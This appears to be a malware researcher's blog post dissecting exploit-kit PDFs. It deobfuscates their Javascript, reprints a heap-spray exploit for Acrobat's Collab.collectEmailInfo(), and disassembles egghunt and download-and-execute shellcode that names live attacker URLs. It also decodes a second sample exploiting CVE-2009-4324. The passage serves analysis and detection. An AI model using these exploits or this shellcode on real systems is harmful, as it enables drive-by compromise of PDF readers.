The obfuscation in this case is just a search and replace with random variable names, so just search and replace them back to something meaningful.

  • Replace ";" with ";\n" and "}" with "}\n" to prettyprint.
  • When you see var M8I2Nb0IWaPT7 = new Array(); you can rename M8I2Nb0IWaPT7 to something more meaningful like "array1".
  • When you see eval(eG76_l); you can rename eG76_l to something like evaluated_string.
  • When you see for(var 6R_6CyPe=0;6R_6CyPe<0x_17x5;6R_6CyPe+=2){ you can say, oh hey, 6R_6CyPe is an index, and 0x_17x5 is the loop count.
  • charCodeAt(index) returns a byte.
  • p0_Y2T (it has .substr) and s___Q35hFa (it has .length) are strings, so rename appropriately.
  • function X6__4k3VdJVb0Id( is a function, so rename appropriately.
  • while(OKD_8Y_tjg < s___Q35hFa.length){ OKD_8Y_tjg++; well, it's a good guess that OKD_8Y_tjg is a loop index.
  • Use common sense to make the Javascript legible to humans. (None of this matters if you're a machine.)
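The search-and-replace steps in the list above are simple enough to script. A rough sketch, with made-up helper names: rename swaps whole identifiers using a mapping you build by reading the code, and prettyprint adds the line breaks. It is deliberately naive and will also break lines inside for(;;) headers and string literals.

```python
import re

def rename(source: str, names: dict[str, str]) -> str:
    """Replace whole identifiers according to the mapping, leaving everything else alone."""
    pattern = re.compile(r"\b(" + "|".join(map(re.escape, names)) + r")\b")
    return pattern.sub(lambda match: names[match.group(1)], source)

def prettyprint(source: str) -> str:
    """Put a line break after every ';' and '}'."""
    return re.sub(r"([;}])", r"\1\n", source)

fragment = "var M8I2Nb0IWaPT7 = new Array();if (v__Maxj) { M8I2Nb0IWaPT7 = v__Maxj;}"
readable = rename(fragment, {"M8I2Nb0IWaPT7": "array1", "v__Maxj": "arg1"})
pretty = prettyprint(readable)
```

One thing to keep in mind: this particular decoder hashes the digits in its own source text, so renaming identifiers that contain digits changes the key. That is why the cleaned-up version keeps a copy of the original text around.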

 

The Javascript gets a copy of itself (the blob of code being eval()'d) using arguments.callee, which it hashes into a four-byte key. I just added a…
var callee = unescape('%66%75%6e%63%74%69%6f%6e%20%58%36%5f [...] %6e%20%30%3b%7d');
of the original obfuscated code (just up to the %09 (TAB) character), and replaced arguments.callee.toString() with callee.

 

function decode(arg1, arg2_hex){
//var argarg = arguments.callee;
var argarg = callee;  // that unescape() I mentioned
//var threethings = 0; // Original
var threethings = 2; // Who cares that app is missing?
var fivetwelve = 512;
argarg = argarg.toString();
try {
      if (app) {
         threethings = 3;
         threethings--; // So you mean 2 then
      }
    } catch(e) {
}
var array1 = new Array();
if (arg1) {
   array1 = arg1;
} else {
   var fourthings = 0;
   var index = 0;
   var fourtynine = 49;
   fourtynine--; // ok 48 then (it's for ASCII "0")
   while(index < argarg.length) {
      var hYE0g_2_q = 1; // unused
      var input_byte = argarg.charCodeAt(index);
      // In set of [0-9]
      if (input_byte >= fourtynine && input_byte <= (fourtynine + 9)) {
         if (fourthings == 4) {
            fourthings = 0;
         }
         if (isNaN(array1[fourthings])) {
            array1[fourthings] = 0;
         }
         array1[fourthings] += input_byte;
         // keep total from getting too big
         if (array1[fourthings] > fivetwelve) {
            array1[fourthings] -= fivetwelve;
         }
          fourthings++;
      } // if
      index++;
  } // while
} // if
 print(array1); // 154,315,117,92
   fourthings = 4;
   fivetwelve = 256;
   while (fourthings > 0) {
      var index = fourthings - 1;
      // keep to a byte
      if (array1[index] > fivetwelve) { //256
         array1[index] -= fivetwelve;   //256
      }
      fourthings--;
   } // while
var indexmod4 = 0;
var evaluated = "";
var JtRA2__j_Ae = 0; // unused
var index2 = 0;
var flag = 0;
var accumulator;
var index3 = 0;
while(index2 < arg2_hex.length) {
//   var c_Y4Ti = arg2_hex.substr(index2, 1) + "J";
   var c_Y4Ti = arg2_hex.substr(index2, 1) ;
   var parsedint = parseInt(c_Y4Ti, 16);
   if (flag) {
      accumulator += parsedint;
      if (indexmod4 == 4) {
         indexmod4 -= 4;
      }
      var lotsomath = accumulator;
      lotsomath = lotsomath - (index3 + 2) * array1[indexmod4];
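      if (lotsomath < 0) {
         var mod256 = Math.floor(lotsomath / 256);
         lotsomath = lotsomath - mod256 * 256;
      }
      lotsomath = String.fromCharCode(lotsomath); // present in the obfuscated original; turns the byte into a character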
      if (threethings == 1) {
         evaluated += parsedint; // This should never run
      } else if (threethings == 2) {
         evaluated += lotsomath; // This is the only line that actually decrypts
      } else {
         evaluated += index2;  // This should never run
      }
      indexmod4++;
      index3++;
      flag = 0;
   } else {
      accumulator = parsedint * 16;
      flag = 1;
   } // if
   index2++;
} // while
eval(evaluated);
return 0;
}
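Stripped of the decoys, the function above does two things: it folds the digits of its own source into a four-byte key, and it subtracts a position-dependent multiple of that key from each hex-encoded byte. Here is a compact sketch of that logic. The names are mine, the key slots start at zero instead of the original's empty array, and encrypt is a hypothetical inverse that exists only so the example can check itself, since the real function text and ciphertext are elided in this post.

```python
def derive_key(function_source: str) -> list[int]:
    """Fold the character codes of every decimal digit in the source into four slots."""
    key = [0, 0, 0, 0]  # the original starts with an empty array; zeros are a simplification
    slot = 0
    for ch in function_source:
        if "0" <= ch <= "9":
            key[slot] += ord(ch)
            if key[slot] > 512:
                key[slot] -= 512
            slot = (slot + 1) % 4
    # Second pass from the original: a single subtraction of 256, not a true modulo.
    return [k - 256 if k > 256 else k for k in key]

def decrypt(hex_text: str, key: list[int]) -> str:
    """Undo the per-byte offset: plain = cipher - (i + 2) * key[i % 4], modulo 256."""
    return "".join(
        chr((byte - (i + 2) * key[i % 4]) % 256)
        for i, byte in enumerate(bytes.fromhex(hex_text))
    )

def encrypt(plain: str, key: list[int]) -> str:
    """Inverse of decrypt(); hypothetical, written only to exercise the round trip."""
    return "".join(
        f"{(ord(ch) + (i + 2) * key[i % 4]) % 256:02X}" for i, ch in enumerate(plain)
    )

key = derive_key("function f1(a2){var b3=4;return 56;}")
round_trip = decrypt(encrypt("eval me", key), key)
```

Because the key comes from the function's own text, any tool that reformats or renames the code before running it will derive a different key, unless it preserves the digits.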

 

The Next Part After That

And finally, we've made it to the crunchy center of this metaphor. This does the heap spray, and exploits Collab.collectEmailInfo(). Nothing really new here.

 


var I8tR_yfW_B_G_4 = new Array();var co3L10RH0e_sDj = 0;var k_IbUu = "";function w4U_ES(QnE1DcNMb, c_i4I__W){var LHE7_u = c_i4I__W.toString();var b1oTk__25tEY4 = "";for(var S8_T83_ajR = 0; S8_T83_ajR < LHE7_u.length; S8_T83_ajR++) {var ksHn4MF6Hh4cHia = parseInt(LHE7_u.substr(S8_T83_ajR, 1));if (!isNaN(ksHn4MF6Hh4cHia)) {ksHn4MF6Hh4cHia = ksHn4MF6Hh4cHia.toString(16);if (ksHn4MF6Hh4cHia.length == 1) { ksHn4MF6Hh4cHia = "0" + ksHn4MF6Hh4cHia; }else if (ksHn4MF6Hh4cHia.length != 2) { ksHn4MF6Hh4cHia = "00"; }b1oTk__25tEY4 = ksHn4MF6Hh4cHia + b1oTk__25tEY4;}}while(b1oTk__25tEY4.length < 8) { b1oTk__25tEY4 = "0" + b1oTk__25tEY4; }var k__7_H1 = QnE1DcNMb.toString(16);if (k__7_H1.length == 1) { k__7_H1 = "0" + k__7_H1; }else if (k__7_H1.length != 2) { k__7_H1 = "00"; }b1oTk__25tEY4 = "3" + k__7_H1 + "P" + b1oTk__25tEY4;return b1oTk__25tEY4;}function Bsv_7_w_r_Vmg(H_O610_85G, G_Rp3BOccXCA){var A_p_p7p2__u2x = new Array("");var nd__8__O_E6 = H_O610_85G;var O86U_8;if ((O86U_8 = H_O610_85G.lastIndexOf("%u00")) != -1) {if (O86U_8 + 6 == H_O610_85G.length) {A_p_p7p2__u2x[0] = H_O610_85G.substr(O86U_8 + 4, 2);nd__8__O_E6 = H_O610_85G.substring(0, O86U_8);}}O86U_8 = 1;for (S8_T83_ajR = 0; S8_T83_ajR < G_Rp3BOccXCA.length; S8_T83_ajR++) {var aD3K_EP_v_WML61 = G_Rp3BOccXCA.charCodeAt(S8_T83_ajR).toString(16);if (aD3K_EP_v_WML61.length == 1) { aD3K_EP_v_WML61 = "0" + aD3K_EP_v_WML61; }A_p_p7p2__u2x[O86U_8] = aD3K_EP_v_WML61;O86U_8++;}S8_T83_ajR = A_p_p7p2__u2x[0].length ? 
0 : 1;A_p_p7p2__u2x[O86U_8] = "00";A_p_p7p2__u2x[O86U_8 + 1] = "00";O86U_8 += 2;if ((A_p_p7p2__u2x.length - S8_T83_ajR) % 2) {A_p_p7p2__u2x[O86U_8] = "00";}while(S8_T83_ajR < A_p_p7p2__u2x.length) {nd__8__O_E6 += "%u" + A_p_p7p2__u2x[S8_T83_ajR + 1] + A_p_p7p2__u2x[S8_T83_ajR];S8_T83_ajR += 2;}nd__8__O_E6 += "%u0000";return nd__8__O_E6;}function jM77Vg3(x56C0_13__c, DcG_u7V_L_s_uJ){while (x56C0_13__c.length*2<DcG_u7V_L_s_uJ) {x56C0_13__c += x56C0_13__c;}x56C0_13__c = x56C0_13__c.substring(0,DcG_u7V_L_s_uJ/2);return x56C0_13__c;}function EU_xp43s(cF_t_wgG__usi_4, gtPWfQ6O, l6__x_1d){var h_2G_2 = 0x0c0c0c0c;var x56C0_13__c = unescape(gtPWfQ6O);var G_Rp3BOccXCA = w4U_ES(cF_t_wgG__usi_4, l6__x_1d);var m8Lnd5_UsJ1f = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050&
[egghunt…] %u3350%uc3c0");var H_O610_85G = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc
[shellcode…] %u3438%u3861%u3361%u3239";app.hVDwfx478 = unescape(Bsv_7_w_r_Vmg(H_O610_85G, G_Rp3BOccXCA));var eY_mn_7_k_Uqk5 = 0x400000;var l825oJ_81__Ny = m8Lnd5_UsJ1f.length * 2;var DcG_u7V_L_s_uJ = eY_mn_7_k_Uqk5 - (l825oJ_81__Ny+0x38);x56C0_13__c = jM77Vg3(x56C0_13__c, DcG_u7V_L_s_uJ);var qj76_s_0_PgMBT = (h_2G_2 - 0x400000)/eY_mn_7_k_Uqk5;for (var Mg_70_P__N_D = 0; Mg_70_P__N_D < qj76_s_0_PgMBT; Mg_70_P__N_D++) {I8tR_yfW_B_G_4[Mg_70_P__N_D] = x56C0_13__c + m8Lnd5_UsJ1f;}}function Ecbg_08LGeWT0(){var SgNX5d = "";for (S8_T83_ajR = 0; S8_T83_ajR < 12; S8_T83_ajR++) {SgNX5d += unescape("%u0c0c%u0c0c");}var PoLA_T6Aa7KrU1s = "";for (S8_T83_ajR = 0; S8_T83_ajR < 750; S8_T83_ajR++) {PoLA_T6Aa7KrU1s += SgNX5d;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: PoLA_T6Aa7KrU1s});app.clearTimeOut(co3L10RH0e_sDj);}function I_w1ifF(o64O_1QbXw){var D__c6_R_Y_qv = co3L10RH0e_sDj;if ((o64O_1QbXw >= 8 && o64O_1QbXw < 8.11) || o64O_1QbXw < 7.1) {EU_xp43s(23, "%u0c0c%u0c0c", o64O_1QbXw);Ecbg_08LGeWT0();} if (D__c6_R_Y_qv) {app.clearTimeOut(D__c6_R_Y_qv);}}var l6__x_1d = 0;var K_U2Nj7_X_3__k = app.plugIns;for (var clWu_2 = 0; clWu_2 < K_U2Nj7_X_3__k.length; clWu_2++) {var A_x_Hr7 = K_U2Nj7_X_3__k[clWu_2].version;if (A_x_Hr7 > l6__x_1d) { l6__x_1d = A_x_Hr7; }}if (app.viewerVersion == 9.103 && l6__x_1d < 9.13) {l6__x_1d = 9.13;}app.C_1aWSr__pbK_tN = I_w1ifF;co3L10RH0e_sDj = app.setTimeOut("app.C_1aWSr__pbK_tN(" + l6__x_1d.toString() + ")", 50);

 

Editorial About Parsing PDFs

Congratulations! If you've made it this far, you're much further along than most PDF scanners. Most don't make it past the getAnnots() call. And, in the future, things are only going to get worse. There are thousands and thousands of object properties available from inside the Acrobat Javascript environment.

To fully parse, not only must you do everything in these:

But you must also handle error cases in the exact same way that Acrobat does. Your parser must be bug-compatible with Acrobat. And, OMG, the things you can do inside of a PDF. (Which I'll decline to say at the moment, lest I give anyone any ideas about new obfuscation techniques. Not that obfuscation poses any problems for us…)

 

Q: So how does FireEye parse PDFs?
A: We use Adobe Acrobat versions 7, 8, and 9 to parse and execute the file.

Oh this is telling...


ISO 32000-1:2008 specifies a digital form for representing electronic documents to enable users to exchange and view electronic documents independent of the environment in which they were created or the environment in which they are viewed or printed. It is intended for the developer of software that creates PDF files (conforming writers), software that reads existing PDF files and interprets their contents for display and interaction (conforming readers) and PDF products that read and/or write PDF files for a variety of other purposes (conforming products).
ISO 32000-1:2008 does not specify the following:

  • specific processes for converting paper or electronic documents to the PDF format;
  • specific technical design, user interface or implementation or operational details of rendering;
  • specific physical methods of storing these documents such as media and storage conditions;
  • methods for validating the conformance of PDF files or readers;
  • required computer hardware and/or operating system.

 

Shellcode

There are two chunks of shellcode: one is Skape's old egghunt shellcode (using the egg value 0x9050905090509050), and the other is a common URLMon download and WinExec() shellcode. (I've seen it in a lot of malware lately, and in a post on some Chinese message board.)
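
If you want to line the "%uXXXX" strings in the Javascript up against the disassembly, something like the following Python sketch will do. The helper name unescape_u is hypothetical, and it only handles %uXXXX escapes, which is a simplification of what the real unescape() does.

```python
import re
import struct

def unescape_u(js_string):
    """Turn "%uXXXX" escapes into the bytes they occupy in memory.

    Each %uXXXX is one UTF-16 code unit, stored little-endian on x86,
    so "%u21eb" becomes the bytes EB 21. Anything that is not a %uXXXX
    escape is ignored here (the real unescape() would keep it).
    """
    units = re.findall(r"%u([0-9a-fA-F]{4})", js_string)
    return b"".join(struct.pack("<H", int(u, 16)) for u in units)

# The first few escapes of the egghunt string from the Javascript.
head = unescape_u("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050")
print(head.hex())
```

The bytes come out as six NOPs, then EB 21, 59, and B8 50 90 50 90, which is how the egghunt listing starts.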

Egghunt Shellcode

Just go read this: egghunt.c

00000000  90                nop
00000001  90                nop
00000002  90                nop
00000003  90                nop
00000004  90                nop
00000005  90                nop
00000006  EB21              jmp short 0x29
00000008  59                pop ecx
00000009  B850905090        mov eax,0x90509050
0000000E  51                push ecx
0000000F  6AFF              push byte -0x1
00000011  33DB              xor ebx,ebx
00000013  648923            mov [fs:ebx],esp
00000016  6A02              push byte +0x2
00000018  59                pop ecx
00000019  8BFB              mov edi,ebx
0000001B  F3AF              repe scasd
0000001D  7507              jnz 0x26
0000001F  FFE7              jmp edi
00000021  6681CBFF0F        or bx,0xfff
00000026  43                inc ebx
00000027  EBED              jmp short 0x16
00000029  E8DAFFFFFF        call 0x8
0000002E  6A0C              push byte +0xc
00000030  59                pop ecx
00000031  8B040C            mov eax,[esp+ecx]
00000034  B1B8              mov cl,0xb8
00000036  83040806          add dword [eax+ecx],byte +0x6
0000003A  58                pop eax
0000003B  83C410            add esp,byte +0x10
0000003E  50                push eax
0000003F  33C0              xor eax,eax
00000041  C3                ret
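
In case the listing is hard to follow: the core of it is "repe scasd" with ECX = 2, which compares two consecutive dwords against 0x90509050 and, on a match, jumps to whatever comes right after them. A minimal Python sketch of just that search, over a flat buffer, is below. The function name find_payload is mine, and the sketch leaves out the part where the real code walks the address space and uses an exception handler to skip unreadable pages.

```python
import struct

EGG_DWORD = 0x90509050                    # value loaded into EAX by the egghunter
EGG = struct.pack("<I", EGG_DWORD) * 2    # two dwords in a row, 8 bytes total

def find_payload(memory):
    """Return the offset just past the first 8-byte egg, or None if absent.

    This corresponds to "jmp edi" after a successful "repe scasd":
    EDI ends up pointing at the first byte following the egg.
    """
    pos = memory.find(EGG)
    return None if pos < 0 else pos + len(EGG)

# Hypothetical memory image: padding, the egg, then the start of a payload.
image = b"\x00" * 100 + EGG + b"\x90\x90\xe8"
print(find_payload(image))
```

Requiring the value twice is what keeps the hunter from finding the single copy of 0x90509050 inside its own "mov eax" instruction.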

 

Download to File and Exec

I started to comment this, because I haven't actually found a marked-up version of it via Google, but I was also supposed to have had this blog post done last week, so I'll document the rest of it at a later date. There are actually two samples here, but they differ by only a few instructions, so I've noted the differences in inline comments.

00000000  90                nop
00000001  90                nop
00000002  90                nop
00000003  90                nop
00000004  90                nop
00000005  90                nop
00000006  90                nop
00000007  90                nop
00000008  90                nop
00000009  90                nop
0000000A  E800000000        call 0xf        ; Leave EIP on the stack for later
0000000F  EB00              jmp short 0x11  ; i.e. the base address of this shellcode
00000011  E9FC000000        jmp 0x112       ; Get EIP again, base address of offset 0x112
00000016  5F                pop edi         ; EDI = EIP = The end
00000017  64A130000000      mov eax,[fs:0x30] ; PEB
0000001D  780C              js 0x2b           ; Check if Windows 95
0000001F  8B400C            mov eax,[eax+0xc] ; PROCESS_MODULE_INFO
00000022  8B701C            mov esi,[eax+0x1c] ; *flink
00000025  AD                lodsd              ; EAX = *blink
00000026  8B6808            mov ebp,[eax+0x8]  ; EBP = kernel32 module base address
00000029  EB09              jmp short 0x34
0000002B  8B4034            mov eax,[eax+0x34] ; Windows 9x boilerplate
0000002E  8D407C            lea eax,[eax+0x7c] ; Because everyone just copies everyone
00000031  8B683C            mov ebp,[eax+0x3c] ; else's (Skape's) shellcode
00000034  8BF7              mov esi,edi        ; ESI = The end, and beginning of hashes
00000036  6A04              push byte +0x4
00000038  59                pop ecx            ; ECX = 0x00000004
00000039  E88F000000        call 0xcd          ; find_functions
0000003E  E2F9              loop 0x39
00000040  686F6E0000        push dword 0x6e6f     ; 
00000045  6875726C6D        push dword 0x6d6c7275 ; "urlmon"
0000004A  54                push esp
0000004B  FF16              call near [esi]       ; LoadLibraryA
0000004D  8BE8              mov ebp,eax
0000004F  E879000000        call 0xcd
00000054  8BD7              mov edx,edi
00000056  47                inc edi               ;
00000057  803F00            cmp byte [edi],0x0
0000005A  75FA              jnz 0x56              ; End of string
0000005C  47                inc edi               ; Skip null
0000005D  57                push edi              ; Beginning of next string
0000005E  47                inc edi               ;
0000005F  803F00            cmp byte [edi],0x0
00000062  75FA              jnz 0x5e
00000064  8BEF              mov ebp,edi           ; EDI points to end of string
00000066  5F                pop edi               ; EDI Beginning of string
00000067  33C9              xor ecx,ecx
00000069  81EC04010000      sub esp,0x104         ; make 260 bytes of space
0000006F  8BDC              mov ebx,esp
; This is the first instruction that these two samples diverge on:
; Only one of them has this.
; 00000071  83C30C            add ebx,byte +0xc    ; Leave 12 bytes of space for "regsvr32 -s "
00000071  51                push ecx              ; 0
00000072  52                push edx              ;
00000073  53                push ebx              ; End of string
00000074  6804010000        push dword 0x104      ; 260
00000079  FF560C            call near [esi+0xc]   ; GetTempPathA
0000007C  5A                pop edx
0000007D  59                pop ecx               ; 
0000007E  51                push ecx              ; jump target from 0xC8
0000007F  52                push edx
00000080  8B02              mov eax,[edx]
00000082  53                push ebx              ; Filename
00000083  43                inc ebx
00000084  803B00            cmp byte [ebx],0x0
00000087  75FA              jnz 0x83                       ; EBX points to end
00000089  817BFC2E657865    cmp dword [ebx-0x4],0x6578652e ; Ends with ".exe"?
; The other version of this shellcode uses ".dll" rather than ".exe"
; 0000008C  817BFC2E646C6C    cmp dword [ebx-0x4],0x6c6c642e ; ".dll"
00000090  7503              jnz 0x95
00000092  83EB08            sub ebx,byte +0x8
00000095  8903              mov [ebx],eax                  ; Doesn't end with ".exe"
00000097  C743042E657865    mov dword [ebx+0x4],0x6578652e ; So append ".exe"
; Again with the DLL
;         C743042E646C6C    mov dword [ebx+0x4],0x6c6c642e ; ".dll"
0000009E  C6430800          mov byte [ebx+0x8],0x0         ; ".exe\0"
000000A2  5B                pop ebx
000000A3  8AC1              mov al,cl
000000A5  0430              add al,0x30
000000A7  884500            mov [ebp+0x0],al
000000AA  33C0              xor eax,eax
000000AC  50                push eax                ; NULL lpfnCB
000000AD  50                push eax                ; NULL dwReserved
000000AE  53                push ebx                ; szFileName
000000AF  57                push edi                ; szURL
000000B0  50                push eax                ; NULL pCaller
000000B1  FF5610            call near [esi+0x10]    ; URLDownloadToFileA
000000B4  83F800            cmp eax,byte +0x0       ; Download ok?
000000B7  7506              jnz 0xbf
000000B9  6A01              push byte +0x1          ; uCmdShow = 1 (SW_SHOWNORMAL)
; The alternative version executes "regsvr32 -s " rather than just a tempfile EXE name
; 83EB0C            sub ebx,byte +0xc              ; back up 12 bytes from beginning
; C70372656773      mov dword [ebx],0x73676572     ; "regs"
; C7430476723332    mov dword [ebx+0x4],0x32337276 ; "vr32"
; C74308202D7320    mov dword [ebx+0x8],0x20732d20 ; " -s "
000000BB  53                push ebx                ; Command Line
000000BC  FF5604            call near [esi+0x4]     ; WinExec
000000BF  5A                pop edx
000000C0  59                pop ecx
000000C1  83C204            add edx,byte +0x4
000000C4  41                inc ecx
000000C5  803A00            cmp byte [edx],0x0
000000C8  75B4              jnz 0x7e
000000CA  FF5608            call near [esi+0x8]     ; ExitProcess
find_functions:
000000CD  51                push ecx                ; 0x00000004
000000CE  56                push esi                ; The end (0x117)
000000CF  8B753C            mov esi,[ebp+0x3c]      ; PE header VMA
000000D2  8B742E78          mov esi,[esi+ebp+0x78]  ; Export table relative offset
; This is just an alternative coding of the same instruction, X86 is full of things like this
; 8B743578          mov esi,[ebp+esi+0x78]
000000D6  03F5              add esi,ebp             ; Export table VMA
000000D8  56                push esi
000000D9  8B7620            mov esi,[esi+0x20]      ; Names table relative offset
000000DC  03F5              add esi,ebp             ; esi = Names table VMA
000000DE  33C9              xor ecx,ecx             ;
000000E0  49                dec ecx                 ; ecx = 0xffffffff
000000E1  41                inc ecx                 ; jmp from 0xF8
000000E2  AD                lodsd                   ; eax = *esi = *Names table VMA
000000E3  03C5              add eax,ebp
000000E5  33DB              xor ebx,ebx
000000E7  0FBE10            movsx edx,byte [eax]    ; next entry
000000EA  3AD6              cmp dl,dh               ; check for NULL (at end of table)
; Another alternative coding. This seems to imply the original source was symbolic, 
; and (re)compiled/assembled to create the other version.
; 38F2              cmp dl,dh
000000EC  7408              jz 0xf6
000000EE  C1CB0D            ror ebx,0xd             ; compute hash
000000F1  03DA              add ebx,edx             ; compute hash ebx = accumulator
000000F3  40                inc eax
000000F4  EBF1              jmp short 0xe7
000000F6  3B1F              cmp ebx,[edi]
000000F8  75E7              jnz 0xe1
000000FA  5E                pop esi
000000FB  8B5E24            mov ebx,[esi+0x24]      ; Ordinals table relative offset
000000FE  03DD              add ebx,ebp             ; Ordinals table VMA
00000100  668B0C4B          mov cx,[ebx+ecx*2]      ; Extrapolate function's ordinal
00000104  8B5E1C            mov ebx,[esi+0x1c]      ; Address table relative offset
00000107  03DD              add ebx,ebp             ; Address table VMA
00000109  8B048B            mov eax,[ebx+ecx*4]     ; Extract the relative function offset from its ordinal
0000010C  03C5              add eax,ebp             ; Function VMA
0000010E  AB                stosd                   ; *edi = eax
0000010F  5E                pop esi
00000110  59                pop ecx
00000111  C3                ret
00000112  E8FFFEFFFF        call 0x16                  ; Get EIP *here = End of shellcode
00000117 db 8e 4e 0e ec             ; [ESI+0]  0xec0e4e8e LoadLibraryA
0000011B db 98 fe 8a 0e             ; [ESI+4]  0x0e8afe98 WinExec 
0000011F db 7e d8 e2 73             ; [ESI+8]  0x73e2d87e ExitProcess
00000123 db 33 ca 8a 5b             ; [ESI+C]  0x5b8aca33 GetTempPathA
00000127 db 36 1a 2f 70             ; [ESI+10] 0x702f1a36 URLDownloadToFileA
0000012B db 6b 74 47 6f 00          ; "ktGo" ??
;Alt:    db 6c 4c 70 6f 00          ; "lLpo" ??
0000014A                                 68 74 74 70 3a 2f  ;           http:/
00000150  2f 67 6f 6f 67 6c 65 2e  63 6f 6d 2e 61 6e 61 6c  ; /google.com.anal
00000160  79 74 69 63 73 2e 65 69  63 79 78 74 61 65 63 75  ; ytics.eicyxtaecu
00000170  6e 2e 63 6f 6d 2f 6e 74  65 2f 41 56 4f 52 50 31  ; n.com/nte/AVORP1
00000180  54 52 45 53 54 31 31 2e  70 79 2f 65 48 39 39 39  ; TREST11.py/eH999
00000190  61 34 35 35 31 56 30 31  30 30 66 30 37 30 30 30  ; a4551V0100f07000
000001a0  36 52 30 30 30 30 30 30  30 30 31 30 32 54 64 32  ; 6R00000000102Td2
000001b0  64 63 63 61 37 64 32 30  31 6c 30 34 30 39 4b 39  ; dcca7d201l0409K9
000001c0  31 61 36 38 39 34 38 33  32 30 00 00              ; 1a68948320..
00000130 db 68 74 74 70 3a 2f 2f 6c  61 72 79 6a 75 2e 69 6e ; http://laryju.in
00000140 db 66 6f 2f 63 67 69 2d 62  69 6e 2f 71 77 2f 65 48 ; fo/cgi-bin/qw/eH
00000150 db 33 66 63 37 66 34 39 65  56 30 31 30 30 66 30 36 ; 3fc7f49eV0100f06
00000160 db 30 30 30 36 52 30 30 30  30 30 30 30 30 31 30 32 ; 0006R00000000102
00000170 db 54 36 63 64 63 38 39 37  38 32 30 31 6c 30 34 30 ; T6cdc8978201l040
00000180 db 39 00                                            ; 9.
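
The dwords at [ESI+0] through [ESI+10] are name hashes, and the loop at 0xE7 through 0xF4 ("ror ebx,0xd" then "add ebx,edx" for each byte of the export name) is what computes them. A small Python sketch of that loop follows; ror13_hash is my own name for it. It treats the bytes as unsigned, which gives the same result as the movsx in the listing for plain ASCII names.

```python
def ror13_hash(name):
    """Rotate the accumulator right by 13 bits, then add the next byte."""
    h = 0
    for byte in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF   # ror ebx,0xd
        h = (h + byte) & 0xFFFFFFFF                # add ebx,edx
    return h

for api in ("LoadLibraryA", "WinExec", "ExitProcess",
            "GetTempPathA", "URLDownloadToFileA"):
    print(f"{ror13_hash(api):08x} {api}")
```

Running a candidate list of export names through this and comparing against the table is how the labels on those five dwords can be checked.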

Breaking News

So, after I'd already written most of this, another PDF sample showed up, also using similar metadata tricks, but in a different way than these Neosploit samples. I suspect it's a different toolkit, as the PDF is structured differently.
[The URL will be something like http://<ip address>/bbh/pdf.php .]

This PDF is also exploiting the recent Adobe 0-day CVE-2009-4324 (and a few others for good measure).

You should all know how to read this by now.

(Unless you've skipped over this entire post to here.)

I'm using 323cd2b18026019ab8364efa96893062 for this example.

The Javascript segments are referenced like this in the PDF.

9 0 obj
<</Creator (Adobe)
/Title 5 0 R
/Producer 14 0 R
/Author 51 0 R
/CreationDate (D:20080924194756)
>>
endobj

 

This object (the info.Author) has the exploit:


51 0 obj
<<
/Filter /FlateDecode
/Length 2630
>>
stream

Decompressed it's "lka166lka175lka16elka163lka174lka169lka16 […]

endstream
endobj
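
FlateDecode is plain zlib/deflate, so getting at the decompressed text doesn't need a PDF library. Here is a minimal Python sketch, assuming a single FlateDecode filter and a direct (not indirect) /Length. The function name inflate_stream is hypothetical, and a real parser has to cope with far more than this.

```python
import re
import zlib

def inflate_stream(obj_bytes):
    """Inflate the stream of one raw PDF object.

    Assumes /Length is a literal integer and the only filter is
    /FlateDecode. Raises if either assumption does not hold.
    """
    length = int(re.search(rb"/Length\s+(\d+)", obj_bytes).group(1))
    start = re.search(rb"stream\r?\n", obj_bytes).end()
    return zlib.decompress(obj_bytes[start:start + length])

# Build a stand-in object, since the real stream body is not reproduced here.
body = zlib.compress(b"lka166lka175lka16elka163lka174lka169")
fake_obj = (b"51 0 obj\n<<\n/Filter /FlateDecode\n/Length %d\n>>\nstream\n" % len(body)
            + body + b"\nendstream\nendobj\n")
print(inflate_stream(fake_obj))
```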

If you don't want to have to deal with all that tedious mucking about with Javascript to decode, just do:
perl -ne 's/lka1//g; print(pack("H*",$_));'
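
For anyone without Perl handy, the same decoding can be sketched in Python. This version mirrors what the Javascript itself ends up doing (swap "lka1" for "%", then unescape) rather than the pack() trick. The function name decode_author is made up for illustration.

```python
from urllib.parse import unquote

def decode_author(stream_text, marker="lka1"):
    """Replace every marker with '%' and percent-decode the result."""
    return unquote(stream_text.replace(marker, "%"), encoding="latin-1")

# The first few tokens of the decompressed Object #51.
print(decode_author("lka166lka175lka16elka163lka174lka169"))
```

Those first six tokens decode to "functi", the start of the script's first function definition.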

 

 


31 0 obj
<< /S /JavaScript /JS 32 0 R >>
endobj
32 0 obj
<<
/Filter /FlateDecode

/Length 159
>>
stream

Uncompressed:


var xyuvam = 'lka';
var z = unescape;
var yhahahahahahavvvvvv = 'p'+z(%6c%61%63%65)+'(/';
eval('var bolshayapizdavam = '%';var nenadoAVscaner = '1/g,bolshayapizdavam)';');
eval('var bu'+'hae'+'ca = ev'+'a'+'l;');


endstream
endobj

 

 


33 0 obj
<< /S /JavaScript /JS 34 0 R >>
endobj
34 0 obj
<<
/Filter /FlateDecode
/Length 102
>>
stream
Uncompressed:


buhaeca('var xyuznaet = this.in'+z(%66%6f%2e%61%75%74)+'hor;');
var poxyunavse = 'xyuznaet.re';


endstream
endobj

Obviously, %66%6f%2e%61%75%74 is fo.aut, so gluing that all together, it becomes this.info.author, otherwise known as Object #51 (shown above).

 

 


35 0 obj
<< /S /JavaScript /JS 36 0 R >>
endobj
36 0 obj
<<
/Filter /FlateDecode
/Length 88
>>
stream
Uncompressed:


var lkaa = poxyunavse + yhahahahahahavvvvvv +xyuvam+ nenadoAVscaner;
var xxx = buhaeca(lkaa);


endstream
endobj

 

 


37 0 obj
<< /S /JavaScript /JS 38 0 R >>
endobj
38 0 obj
<<
/Filter /FlateDecode
/Length 60
>>
stream
Uncompressed:


var ietoktoewe = z(unescape(xxx));
buhaeca(ietoktoewe);


endstream
endobj
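
To see what those four scripts add up to without running them in Acrobat, the string pieces can be pasted together by hand. Below is a Python sketch that does only the concatenation, keeping the sample's variable names and using unquote as a stand-in for unescape. Nothing here evaluates the result.

```python
from urllib.parse import unquote

z = unquote                                        # stand-in for "var z = unescape;"

# Object 32
xyuvam = "lka"
yhahahahahahavvvvvv = "p" + z("%6c%61%63%65") + "(/"
bolshayapizdavam = "%"
nenadoAVscaner = "1/g,bolshayapizdavam)"

# Object 34
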